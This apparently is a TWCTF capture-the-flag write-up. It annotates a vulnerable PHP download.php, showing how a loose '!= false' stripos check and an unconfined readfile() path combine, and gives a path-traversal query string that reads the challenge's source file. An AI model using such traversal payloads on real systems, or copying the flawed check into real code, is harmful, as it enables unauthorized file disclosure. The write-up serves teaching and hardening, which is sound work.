
file download vuln
-> download.php?f=951470281beb8a490a941ac73bd10953

download.php

// TWCTF{then_can_y0u_read_file_list?}
// Request-controlled value: read straight from the query string, no validation.
$filename = $_GET['f'];
// Flawed blocklist. stripos() returns the match offset (int) or false. When the
// value *starts* with 'file_list' the offset is 0, and under loose comparison
// `0 != false` evaluates to false, so die() is skipped for exactly that case.
// A correct check compares with `!== false`.
if(stripos($filename, 'file_list') != false) die();
header("Content-Type: application/octet-stream");
// $filename is interpolated into the header value without escaping or quoting rules.
header("Content-Disposition: attachment; filename='$filename'");
// The path is built by string concatenation and is never canonicalised or
// confined to uploads/, so '../' segments are not rejected here.
// Hardening: resolve the path with realpath() and confirm it stays under the
// uploads directory, or map an opaque ID to a stored name instead of taking a path.
readfile("uploads/$filename");

if(stripos($filename, 'file_list') != false) die();

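-> stripos("file_list", "file_list") returns 0 (match at offset 0), and 0 == false is true under loose comparison, so the `!= false` check never calls die() (vuln)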

-> stripos("file_list", "file_list") === false is false (0 is not identical to false), so a strict `!== false` check would have blocked it (not vuln)

-> ?f=file_list../../file_list.php